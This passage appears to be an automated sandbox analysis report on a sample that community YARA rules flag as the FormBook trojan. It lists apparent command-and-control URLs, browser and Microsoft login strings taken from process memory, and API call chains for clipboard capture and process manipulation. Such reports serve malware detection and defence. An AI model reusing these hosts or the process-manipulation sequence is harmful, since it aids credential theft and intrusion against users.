rCLBh&\r&`&gPprKS4!`:r+W%RY\^M`ivJ~`7gLpyA4a(!Imr*M3V
            Source: RmClient.exe, 00000005.00000002.4591201110.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4590179288.000000000498C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mommymode.site/hya5/?ntHx=DVDDWR70P4Ux&nV=kBImd3s/QyLjHyq4SLIoEPo9gYVaCCo4aEwkxNbGH3XUM96sRoR
            Source: RmClient.exe, 00000005.00000002.4591201110.0000000003FDE000.00000004.10000000.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4590179288.0000000003E8E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nakama2-sshl.xyz/ui3j/?nV=Ezegw1wupX22aLPkoEEv7/ZO5DjzGXXdsNrfcd
            Source: RmClient.exe, 00000005.00000002.4591201110.0000000003804000.00000004.10000000.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4590179288.00000000036B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2664524956.0000000000AC4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://newdaydawning.net/7mju/?ntHx=DVDDWR70P4Ux&nV=n/a1XNlERIMSMkzeywaNMrPIuUD1rrysoFUi8ENskqLMFqSk
            Source: avmjQSNkeFbUoa.exe, 00000006.00000002.4591962813.000000000575F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.polarmuseum.info
            Source: avmjQSNkeFbUoa.exe, 00000006.00000002.4591962813.000000000575F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.polarmuseum.info/nuqv/
            Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RmClient.exe, 00000005.00000002.4591201110.0000000003B28000.00000004.10000000.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4590179288.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: RmClient.exe, 00000005.00000002.4588947900.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: RmClient.exe, 00000005.00000002.4588947900.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: RmClient.exe, 00000005.00000002.4588947900.000000000098A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desdL
            Source: RmClient.exe, 00000005.00000002.4588947900.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: RmClient.exe, 00000005.00000002.4588947900.000000000098A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: RmClient.exe, 00000005.00000002.4588947900.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: RmClient.exe, 00000005.00000002.4588947900.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: RmClient.exe, 00000005.00000003.2554231384.00000000078A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: RmClient.exe, 00000005.00000002.4591201110.0000000004C6E000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000005.00000002.4593050924.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4590179288.0000000004B1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C433 NtClose,2_2_0042C433
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B60 NtClose,LdrInitializeThunk,2_2_03672B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03672DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03672C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036735C0 NtCreateMutant,LdrInitializeThunk,2_2_036735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674340 NtSetContextThread,2_2_03674340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674650 NtSuspendThread,2_2_03674650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BE0 NtQueryValueKey,2_2_03672BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BF0 NtAllocateVirtualMemory,2_2_03672BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BA0 NtEnumerateValueKey,2_2_03672BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B80 NtQueryInformationFile,2_2_03672B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AF0 NtWriteFile,2_2_03672AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AD0 NtReadFile,2_2_03672AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AB0 NtWaitForSingleObject,2_2_03672AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F60 NtCreateProcessEx,2_2_03672F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F30 NtCreateSection,2_2_03672F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FE0 NtCreateFile,2_2_03672FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FA0 NtQuerySection,2_2_03672FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FB0 NtResumeThread,2_2_03672FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F90 NtProtectVirtualMemory,2_2_03672F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E30 NtWriteVirtualMemory,2_2_03672E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EE0 NtQueueApcThread,2_2_03672EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EA0 NtAdjustPrivilegesToken,2_2_03672EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E80 NtReadVirtualMemory,2_2_03672E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D30 NtUnmapViewOfSection,2_2_03672D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D00 NtSetInformationFile,2_2_03672D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D10 NtMapViewOfSection,2_2_03672D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DD0 NtDelayExecution,2_2_03672DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DB0 NtEnumerateKey,2_2_03672DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C60 NtCreateKey,2_2_03672C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C00 NtQueryInformationProcess,2_2_03672C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CF0 NtOpenProcess,2_2_03672CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CC0 NtQueryVirtualMemory,2_2_03672CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CA0 NtQueryInformationToken,2_2_03672CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673010 NtOpenDirectoryObject,2_2_03673010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673090 NtSetValueKey,2_2_03673090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036739B0 NtGetContextThread,2_2_036739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D70 NtOpenThread,2_2_03673D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D10 NtOpenProcessToken,2_2_03673D10
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E64340 NtSetContextThread,LdrInitializeThunk,5_2_02E64340
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E64650 NtSuspendThread,LdrInitializeThunk,5_2_02E64650
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62AF0 NtWriteFile,LdrInitializeThunk,5_2_02E62AF0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62AD0 NtReadFile,LdrInitializeThunk,5_2_02E62AD0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62BE0 NtQueryValueKey,LdrInitializeThunk,5_2_02E62BE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02E62BF0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_02E62BA0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62B60 NtClose,LdrInitializeThunk,5_2_02E62B60
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62EE0 NtQueueApcThread,LdrInitializeThunk,5_2_02E62EE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_02E62E80
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62FE0 NtCreateFile,LdrInitializeThunk,5_2_02E62FE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62FB0 NtResumeThread,LdrInitializeThunk,5_2_02E62FB0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62F30 NtCreateSection,LdrInitializeThunk,5_2_02E62F30
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_02E62CA0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62C60 NtCreateKey,LdrInitializeThunk,5_2_02E62C60
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02E62C70
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02E62DF0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62DD0 NtDelayExecution,LdrInitializeThunk,5_2_02E62DD0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_02E62D30
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62D10 NtMapViewOfSection,LdrInitializeThunk,5_2_02E62D10
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E635C0 NtCreateMutant,LdrInitializeThunk,5_2_02E635C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E639B0 NtGetContextThread,LdrInitializeThunk,5_2_02E639B0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62AB0 NtWaitForSingleObject,5_2_02E62AB0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62B80 NtQueryInformationFile,5_2_02E62B80
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62EA0 NtAdjustPrivilegesToken,5_2_02E62EA0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62E30 NtWriteVirtualMemory,5_2_02E62E30
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62FA0 NtQuerySection,5_2_02E62FA0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62F90 NtProtectVirtualMemory,5_2_02E62F90
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62F60 NtCreateProcessEx,5_2_02E62F60
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62CF0 NtOpenProcess,5_2_02E62CF0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62CC0 NtQueryVirtualMemory,5_2_02E62CC0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62C00 NtQueryInformationProcess,5_2_02E62C00
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62DB0 NtEnumerateKey,5_2_02E62DB0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E62D00 NtSetInformationFile,5_2_02E62D00
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E63090 NtSetValueKey,5_2_02E63090
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E63010 NtOpenDirectoryObject,5_2_02E63010
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E63D70 NtOpenThread,5_2_02E63D70
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E63D10 NtOpenProcessToken,5_2_02E63D10
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_006A8D80 NtCreateFile,5_2_006A8D80
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_006A8EF0 NtReadFile,5_2_006A8EF0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_006A8FE0 NtDeleteFile,5_2_006A8FE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_006A9080 NtClose,5_2_006A9080
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_006A91E0 NtAllocateVirtualMemory,5_2_006A91E0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CEF0E9 NtQueryInformationProcess,5_2_02CEF0E9
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CEFA38 NtSetContextThread,5_2_02CEFA38
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0044F4300_2_0044F430
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0044EB5F0_2_0044EB5F
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0420A6480_2_0420A648
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004183F32_2_004183F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030F02_2_004030F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012202_2_00401220
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EA232_2_0042EA23
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FC732_2_0040FC73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040256C2_2_0040256C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025102_2_00402510
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004165CE2_2_004165CE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004165D32_2_004165D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FE932_2_0040FE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DF132_2_0040DF13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA3522_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F02_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037003E62_2_037003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E02742_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C02C02_2_036C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C81582_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036301002_2_03630100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA1182_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F81CC2_2_036F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F41A22_2_036F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037001AA2_2_037001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D20002_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036407702_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036647502_2_03664750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C02_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C6E02_2_0365C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036405352_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037005912_2_03700591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F24462_2_036F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E44202_2_036E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EE4F62_2_036EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB402_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F6BD72_2_036F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA802_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036569622_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A02_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370A9A62_2_0370A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364A8402_2_0364A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036428402_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E8F02_2_0366E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036268B82_2_036268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4F402_2_036B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03682F282_2_03682F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660F302_2_03660F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E2F302_2_036E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364CFE02_2_0364CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632FC82_2_03632FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BEFA02_2_036BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640E592_2_03640E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEE262_2_036FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEEDB2_2_036FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652E902_2_03652E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FCE932_2_036FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364AD002_2_0364AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DCD1F2_2_036DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363ADE02_2_0363ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03658DBF2_2_03658DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640C002_2_03640C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630CF22_2_03630CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0CB52_2_036E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362D34C2_2_0362D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F132D2_2_036F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0368739A2_2_0368739A
